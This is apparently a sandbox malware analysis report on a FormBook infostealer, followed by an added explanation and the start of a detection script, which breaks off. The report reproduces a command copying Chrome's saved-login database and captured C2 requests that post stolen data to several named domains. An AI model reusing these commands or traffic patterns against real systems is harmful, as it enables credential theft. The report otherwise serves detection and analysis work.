
# Analysis Report xg28sL5JDm.exe

## Overview

### General Information

- Sample Name: xg28sL5JDm.exe
- MD5: 427c74cd09c5e3da8c9c9f3d5c1c126a
- SHA1: 59583b1abf57a9d1d01de013d864ec3c75d68938
- SHA256: e082a8136dd0aa48cfefb68b6afb0878004c250f50900efddba892fc23c68500
- Most interesting Screenshot:

### Detection

- Family: FormBook
- Score: 100 (range 0 - 100)
- Whitelisted: false
- Confidence: 100%

### Signatures

- Antivirus / Scanner detection for submitted sample
- Antivirus detection for dropped file
- Benign windows process drops PE files
- Detected FormBook malware
- Detected unpacking (changes PE section rights)
- Malicious sample detected (through community Yara rule)
- Multi AV Scanner detection for domain / URL
- Multi AV Scanner detection for dropped file
- Multi AV Scanner detection for submitted file
- System process connects to network (likely due to code injection or exploit)
- Yara detected FormBook
- Contains functionality to detect sleep reduction / modifications
- Maps a DLL or memory area into another process
- Queues an APC in another process (thread injection)
- Sample uses process hollowing technique
- Sigma detected: Suspicious Svchost Process
- Tries to detect virtualization through RDTSC time measurements
- Tries to harvest and steal browser information (history, passwords, etc)
- Tries to resolve many domain names, but no domain seems valid
- Tries to steal Mail credentials (via file access)
- Antivirus or Machine Learning detection for unpacked file
- Checks if the current process is being debugged
- Contains functionality for execution timing, often used to detect debuggers
- Contains functionality to query locale information (e.g. system language)
- Contains functionality to call native functions
- Contains functionality to check if a window is minimized (may be used to check if an application is visible)
- Contains functionality to detect sandboxes (mouse cursor move detection)
- Contains functionality to dynamically determine API calls
- Contains functionality to read the PEB
- Contains functionality to retrieve information about pressed keystrokes
- Creates a DirectInput object (often for capturing keystrokes)
- Creates a process in suspended mode (likely to inject code)
- Detected potential crypto function
- Domain name seen in connection with other malware
- Drops PE files
- Enables debug privileges
- Extensive use of GetProcAddress (often used to hide API calls)
- Found inlined nop instructions (likely shell or obfuscated code)
- Found large amount of non-executed APIs
- Found potential string decryption / allocating functions
- HTTP GET or POST without a user agent
- IP address seen in connection with other malware
- Internet Provider seen in connection with other malware
- May sleep (evasive loops) to hinder dynamic analysis
- PE file contains strange resources
- Queries the volume information (name, serial number etc) of a device
- Sample execution stops while process was sleeping (likely an evasion)
- Sample file is different than original file name gathered from version info
- Searches the installation path of Mozilla Firefox
- Uses a known web browser user agent for HTTP communication
- Uses code obfuscation techniques (call, push, ret)
- Yara signature match

## Malware Configuration

No configs have been found
Yara matches (Source, Rule, Description, Author, Strings):

- Source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  - 0x15749: $sqlite3step: 68 34 1C 7B E1
  - 0x1585c: $sqlite3step: 68 34 1C 7B E1
  - 0x15778: $sqlite3text: 68 38 2A 90 C5
  - 0x1589d: $sqlite3text: 68 38 2A 90 C5
  - 0x1578b: $sqlite3blob: 68 53 D8 7F 8C
  - 0x158b3: $sqlite3blob: 68 53 D8 7F 8C
- Source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  - 0x7248: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x74b2: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x12ae5: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  - 0x125d1: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  - 0x12be7: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  - 0x12d5f: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  - 0x802a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  - 0x1184c: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  - 0x89c3: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  - 0x17e37: $sequence_8: 3C 54 74 04 3C 74 75 F4
  - 0x18e3a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  - 0x15749: $sqlite3step: 68 34 1C 7B E1
  - 0x1585c: $sqlite3step: 68 34 1C 7B E1
  - 0x15778: $sqlite3text: 68 38 2A 90 C5
  - 0x1589d: $sqlite3text: 68 38 2A 90 C5
  - 0x1578b: $sqlite3blob: 68 53 D8 7F 8C
  - 0x158b3: $sqlite3blob: 68 53 D8 7F 8C
Yara matches on unpacked PEs (Source, Rule, Description, Author, Strings):

- Source: 3.2.xg28sL5JDm.exe.400000.0.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 3.2.xg28sL5JDm.exe.400000.0.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  - 0x14949: $sqlite3step: 68 34 1C 7B E1
  - 0x14a5c: $sqlite3step: 68 34 1C 7B E1
  - 0x14978: $sqlite3text: 68 38 2A 90 C5
  - 0x14a9d: $sqlite3text: 68 38 2A 90 C5
  - 0x1498b: $sqlite3blob: 68 53 D8 7F 8C
  - 0x14ab3: $sqlite3blob: 68 53 D8 7F 8C
- Source: 3.2.xg28sL5JDm.exe.400000.0.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  - 0x6448: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x66b2: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x11ce5: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  - 0x117d1: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  - 0x11de7: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  - 0x11f5f: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  - 0x722a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  - 0x10a4c: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  - 0x7bc3: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  - 0x17037: $sequence_8: 3C 54 74 04 3C 74 75 F4
  - 0x1803a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  - 0x15749: $sqlite3step: 68 34 1C 7B E1
  - 0x1585c: $sqlite3step: 68 34 1C 7B E1
  - 0x15778: $sqlite3text: 68 38 2A 90 C5
  - 0x1589d: $sqlite3text: 68 38 2A 90 C5
  - 0x1578b: $sqlite3blob: 68 53 D8 7F 8C
  - 0x158b3: $sqlite3blob: 68 53 D8 7F 8C

## Sigma Overview

### System Summary:

Source: Process started; Author: Joe Security; Data:
- Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
- CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
- CommandLine|base64offset|contains:
- Image: C:\Windows\SysWOW64\cmd.exe
- NewProcessName: C:\Windows\SysWOW64\cmd.exe
- OriginalFileName: C:\Windows\SysWOW64\cmd.exe
- ParentCommandLine: C:\Windows\SysWOW64\svchost.exe
- ParentImage: C:\Windows\SysWOW64\svchost.exe
- ParentProcessId: 5972
- ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
- ProcessId: 3252

Sigma detected: Suspicious Svchost Process

Source: Process started; Author: Florian Roth; Data:
- Command: C:\Windows\SysWOW64\svchost.exe
- CommandLine: C:\Windows\SysWOW64\svchost.exe
- CommandLine|base64offset|contains:
- Image: C:\Windows\SysWOW64\svchost.exe
- NewProcessName: C:\Windows\SysWOW64\svchost.exe
- OriginalFileName: C:\Windows\SysWOW64\svchost.exe
- ParentCommandLine:
- ParentImage: C:\Windows\explorer.exe
- ParentProcessId: 2928
- ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe
- ProcessId: 5972

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started; Author: vburov; Data:
- Command: C:\Windows\SysWOW64\svchost.exe
- CommandLine: C:\Windows\SysWOW64\svchost.exe
- CommandLine|base64offset|contains:
- Image: C:\Windows\SysWOW64\svchost.exe
- NewProcessName: C:\Windows\SysWOW64\svchost.exe
- OriginalFileName: C:\Windows\SysWOW64\svchost.exe
- ParentCommandLine:
- ParentImage: C:\Windows\explorer.exe
- ParentProcessId: 2928
- ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe
- ProcessId: 5972

## Signature Overview

### AV Detection:

Antivirus / Scanner detection for submitted sample
- Source: xg28sL5JDm.exe; Avira: detected

Antivirus detection for dropped file
- Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe; Avira: detection malicious, Label: HEUR/AGEN.1046743

Multi AV Scanner detection for domain / URL
- Source: www.allixanes.com; Virustotal: Detection: 6%
- Source: http://www.allixanes.com/ez3/; Virustotal: Detection: 11%
- Source: http://www.allixanes.com; Virustotal: Detection: 6%
- Source: http://www.tylermercer.net/ez3/; Virustotal: Detection: 7%

Multi AV Scanner detection for dropped file
- Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe; Virustotal: Detection: 81%
- Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe; Metadefender: Detection: 28%
- Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe; ReversingLabs: Detection: 90%

Multi AV Scanner detection for submitted file
- Source: xg28sL5JDm.exe; Virustotal: Detection: 81%
- Source: xg28sL5JDm.exe; Metadefender: Detection: 28%
- Source: xg28sL5JDm.exe; ReversingLabs: Detection: 90%

Yara detected FormBook
- Source: Yara match; File source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY
- Source: Yara match; File source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
- Source: Yara match; File source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE

Antivirus or Machine Learning detection for unpacked file
- Source: 15.1.sdv88p2lg.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 3.2.xg28sL5JDm.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 3.1.xg28sL5JDm.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 15.2.sdv88p2lg.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 14.2.sdv88p2lg.exe.2270000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 5.2.svchost.exe.2d00000.2.unpack; Avira: Label: TR/Patched.Ren.Gen
- Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 14.2.sdv88p2lg.exe.2600000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Contains functionality to enumerate / list files inside a directory
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 0_2_004051BC GetModuleHandleA, GetProcAddress, lstrcpyn, lstrcpyn, lstrcpyn, FindFirstFileA, FindClose, lstrlen, lstrcpyn, lstrlen, lstrcpyn (0_2_004051BC)

Found inlined nop instructions (likely shell or obfuscated code)
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then mov ebx, 000014B9h (0_2_00469CD0)
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then push 00000000h (0_2_00469CD0)
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then mov eax, dword ptr [00475BF0h] (0_2_00469CD0)
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then mov dl, byte ptr [eax+0046BF64h] (0_2_00469CD0)
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then inc ebx (0_2_00469CD0)
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then mov eax, dword ptr [esp] (0_2_00469C6C)
- Source: C:\Users\user\Desktop\xg28sL5JDm.exe; Code function: 4x nop then pop edi (3_2_0040BB4B)
- Source: C:\Windows\SysWOW64\svchost.exe; Code function: 4x nop then pop edi (5_2_0040BB4B)
- Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe; Code function: 4x nop then mov eax, dword ptr [esi+34h] (14_2_022B4705)
- Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe; Code function: 4x nop then jmp 022B5F22h (14_2_022B5766)
- Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe; Code function: 4x nop then add edx, 02h (14_2_022B7243)
- Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe; Code function: 4x nop then mov dword ptr [ebp+10h], ebx (14_2_022B3ED1)
- Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe; Code function: 4x nop then call dword ptr [edi+000000F4h] (14_2_022B282D)
- Source: C:\Windows\SysWOW64\wscript.exe; Code function: 4x nop then pop edi (18_2_007ABB4B)

### Networking:

Tries to resolve many domain names, but no domain seems valid
- Source: unknown; DNS traffic detected: query: www.tinbaofb.com, replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.tatilultra.com, replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.tqg6k4jl-0k8rlg.com, replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.greenslandscapingllc.com, replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.estereojerusalenfm.com, replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.zqhanu.men, replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.chestermerecalgaryhomes.info, replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.oraning.net, replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.hoops2life.net, replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.vxstfh.men, replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.jwc.bet, replaycode: Name error (3)
- Source: unknown; DNS traffic detected: query: www.djhong.net, replaycode: Name error (3)

Domain name seen in connection with other malware
- Source: Joe Sandbox View; Domain Name: www.allixanes.com

HTTP GET or POST without a user agent
- Source: global traffic; HTTP traffic detected:

```http
GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.pawlowski.life
Connection: close
Data Raw: 00 00 00 00 00 00 00

GET /ez3/?dL3=oh/nSlzENG0qUOAwPXeIQOtwW6r8d6QREB9M6hBu+NM+9UHPsG9g+Ot2gFGRe3aStlqv&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.lcpierpontphotography.com
Connection: close
Data Raw: 00 00 00 00 00 00 00

GET /ez3/?dL3=7CEQ+k742KWuCXQBHgFuLA7JV8UfVcRSEMIHryxdtZ0WgVQp3Q3kFEzSW7ScRDzGFE92&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.tylermercer.net
Connection: close
Data Raw: 00 00 00 00 00 00 00

GET /ez3/?dL3=X3u3PzGnlM4B8cIThswW3+TZhgNWE0aZtyVvUn4Lv16SAoXv0FRCFRv3M3XIz91P9rzv&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.allixanes.com
Connection: close
Data Raw: 00 00 00 00 00 00 00

GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.pawlowski.life
Connection: close
Data Raw: 00 00 00 00 00 00 00
```

IP address seen in connection with other malware
- Source: Joe Sandbox View; IP Address: 198.185.159.144
- Source: Joe Sandbox View; IP Address: 198.185.159.144

Internet Provider seen in connection with other malware
- Source: Joe Sandbox View; ASN Name: unknown
- Source: Joe Sandbox View; ASN Name: unknown
- Source: Joe Sandbox View; ASN Name: unknown
Uses a known web browser user agent for HTTP communication
- Source: global traffic; HTTP traffic detected (request bodies omitted):

```http
POST /ez3/ HTTP/1.1
Host: www.lcpierpontphotography.com
Connection: close
Content-Length: 153125
Cache-Control: no-cache
Origin: http://www.lcpierpontphotography.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.lcpierpontphotography.com/ez3/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

POST /ez3/ HTTP/1.1
Host: www.tylermercer.net
Connection: close
Content-Length: 153125
Cache-Control: no-cache
Origin: http://www.tylermercer.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.tylermercer.net/ez3/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

POST /ez3/ HTTP/1.1
Host: www.allixanes.com
Connection: close
Content-Length: 153125
Cache-Control: no-cache
Origin: http://www.allixanes.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.allixanes.com/ez3/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
```

- Source: global traffic; HTTP traffic detected:

```http
GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.pawlowski.life
Connection: close
Data Raw: 00 00 00 00 00 00 00

GET /ez3/?dL3=oh/nSlzENG0qUOAwPXeIQOtwW6r8d6QREB9M6hBu+NM+9UHPsG9g+Ot2gFGRe3aStlqv&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.lcpierpontphotography.com
Connection: close
Data Raw: 00 00 00 00 00 00 00

GET /ez3/?dL3=7CEQ+k742KWuCXQBHgFuLA7JV8UfVcRSEMIHryxdtZ0WgVQp3Q3kFEzSW7ScRDzGFE92&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.tylermercer.net
Connection: close
Data Raw: 00 00 00 00 00 00 00

GET /ez3/?dL3=X3u3PzGnlM4B8cIThswW3+TZhgNWE0aZtyVvUn4Lv16SAoXv0FRCFRv3M3XIz91P9rzv&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.allixanes.com
Connection: close
Data Raw: 00 00 00 00 00 00 00

GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.pawlowski.life
Connection: close
Data Raw: 00 00 00 00 00 00 00
```
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.oraning.net
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 67 44 7a 64 4d 41 6d 55 4a 44 4e 43 4b 2d 73 32 4e 51 4f 57 43 49 52 6f 63 37 50 49 65 71 64 50 57 45 51 35 70 42 78 76 75 39 4d 5a 33 32 58 50 6a 6c 6c 35 75 61 51 6f 37 30 4b 56 59 55 61 47 34 55 54 37 36 58 37 66 44 55 58 32 7e 62 6e 63 79 61 61 49 45 4f 75 31 59 66 42 7a 35 61 77 6f 72 56 69 53 72 2d 35 7a 43 41 4c 70 4b 54 48 34 67 47 54 47 79 78 4e 39 47 43 6d 48 5a 68 6f 43 34 34 70 75 38 39 45 51 50 6d 42 7a 70 56 46 4c 72 49 6f 6c 55 5a 6e 4e 4a 44 56 4d 79 4c 56 59 74 46 42 75 47 7a 77 79 76 2d 45 45 58 57 34 51 59 66 38 56 33 7a 66 70 7a 6e 69 46 48 49 6f 71 62 4d 28 32 7e 4a 43 57 69 54 63 56 49 59 78 55 6b 67 73 53 31 71 6e 53 4e 5f 63 4b 43 4c 65 5a 5a 5f 39 6b 49 36 4f 41 59 75 72 39 67 58 6f 6c 46 78 61 5f 6f 6e 55 6c 4d 5a 53 6d 35 48 70 52 68 4d 54 41 28 39 76 59 52 4c 41 56 30 53 46 66 43 30 52 6e 4e 61 48 6c 42 53 7a 4f 7e 4c 4e 75 37 51 6c 7a 32 58 53 46 62 42 74 77 32 6d 65 44 6e 78 65 38 4c 52 67 37 7e 56 34 51 6a 4f 54 7a 59 4c 31 46 65 54 38 47 39 73 6f 30 45 73 70 76 39 41 6d 68 39 58 4b 43 4e 61 34 42 57 6b 55 74 56 77 4e 59 36 51 71 6f 38 37 72 56 31 6c 68 6d 72 34 38 32 57 37 33 5f 4c 51 70 5a 44 39 34 45 79 6a 72 69 51 31 48 5a 64 75 46 6d 59 44 48 76 42 34 48 59 66 52 43 59 77 62 7e 6c 72 34 7a 46 35 6d 69 74 6a 36 6a 6a 69 32 56 49 28 73 39 34 74 32 6f 45 6a 53 57 71 30 50 33 79 32 63 4d 59 58 33 48 61 51 61 5a 79 34 30 72 46 70 75 72 5a 71 6c 28 4f 4a 35 4e 5f 64 5a 47 6b 41 47 4d 32 30 77 4f 64 48 52 6e 6d 4a 4e 74 57 30 6c 66 74 71 31 6c 4b 65 45 65 74 4f 77 53 76 34 38 
52 79 4c 71 41 7a 52 65 73 64 55 56 73 50 73 75 72 76 50 61 4a 66 45 47 6e 37 53 73 59 39 41 4a 39 6e 35 46 6b 44 59 58 6b 32 7e 50 4f 57 6b 6c 6c 56 6b 57 28 4f 4d 4a 54 4d 48 69 43 34 76 6b 34 35 52 58 6b 65 41 53 54 69 72 5f 28 37 64 73 59 53 7a 5a 59 4c 52 49 44 32 65 48 68 6a 42 35 63 45 46 6e 55 45 66 46 4a 31 34 53 4b 64 36 36 71 42 7e 79 6b 75 37 77 58 33 70 2d 38 6c 31 74 43 4d 73 6e 66 58 6a 46 5a 67 7e 78 35 72 28 64 69 31 44 4a 4f 50 71 65 79 53 6c 33 39 47 6f 31 4f 74 65 64 59 51 6c 63 63 2d 34 5a 41 52 43 52 31 6d 58 4b 7e 48 34 70 64 65 69 43 6a 41 45 63 61 37 45 72 75 57 28 64 78 4e 72 37 34 47 52 69 70 37 55 4d 4b 5f 44 62 4f 33 6d 77 6a 36 68 67 65 6b 67 6d 44 77 35 77 65 74 6b 52 7a 66 36 4f 6c 73 52 79 79 70 74 4e 74 72 6e 5f 62 49 30 44 50 52 69 6d 4f 58 67 42 78 49 64 78 5a 6b 76 63 61 54 31 6c 79 70 68 4c 61 4f 75 4e 71 5f 56 49 77 46 28 4c 44 70 54 42 51 44 6a 33 6e 53 32 5a 41 49 43 31 43 62 6d 49 65 4e 4a 6f 72 6f 59 7a 57 55 6a 45 67 63 77 4e 51 53 72 70 4c 69 6b 6a 36 4e 6b 5
 Source: global traffic HTTP traffic detected:
 HTTP/1.1 404 Not Found
 Content-Type: text/html
 Server: Microsoft-IIS/8.5
 X-Powered-By: ASP.NET
 Date: Tue, 19 May 2020 08:38:38 GMT
 Connection: close
 Content-Length: 1245
 Data Ascii (decoded from the truncated raw hex dump):
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
 <title>404 - File or directory not found.</title>
 <style type="text/css">
 <!--
 body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
 fieldset{padding:0 15px 10px 15px;}
 h1{font-size:2.4em;margin:0;color:#FFF;}
 h2{font-size:1.7em;margin:0;color:#CC0000;}
 h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
 #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
 background-color:#555555;}
 #content{margin:0 0 0 2%;position:relative;}
 .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
 -->
 </style>
 </head>
 <body>
 <div id="header"><h
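The request above carries the traits that make a Formbook check-in recognisable in proxy or pcap data: a POST to a short path (/ez3/) whose Origin and Referer merely echo the request's own host and path, an IE11 Trident user agent with Connection: close, and a form-urlencoded body that is one short key (dL3) followed by a single long token over a base64-like alphabet extended with -, _, ( and ~. The 404 returned by www.lcpierpontphotography.com is not evidence that nothing left the host: the 153125-byte body is on the wire before the status line comes back, and the same path appears in svchost.exe memory under a different host (www.allixanes.com/ez3/), the rotating-domain behaviour behind the "tries to resolve many domain names" signature. The script below is an added example, not part of the Joe Sandbox report: it parses raw HTTP/1.1 requests, scores each against those traits and lists paths POSTed to more than one host. Its input is constructed: the first request reuses the headers captured above with the body cut to the captured prefix, the second is a hypothetical request to www.allixanes.com with a made-up token and length, the third is a benign login form; the 4096-byte threshold and the body regex are assumptions to tune per environment.

```python
"""Flag Formbook-style C2 POSTs in raw HTTP/1.1 requests (added example)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Body shape seen in this report: one short key, one long value over a
# base64-like alphabet extended with '-', '_', '(' and '~'. ASSUMED pattern.
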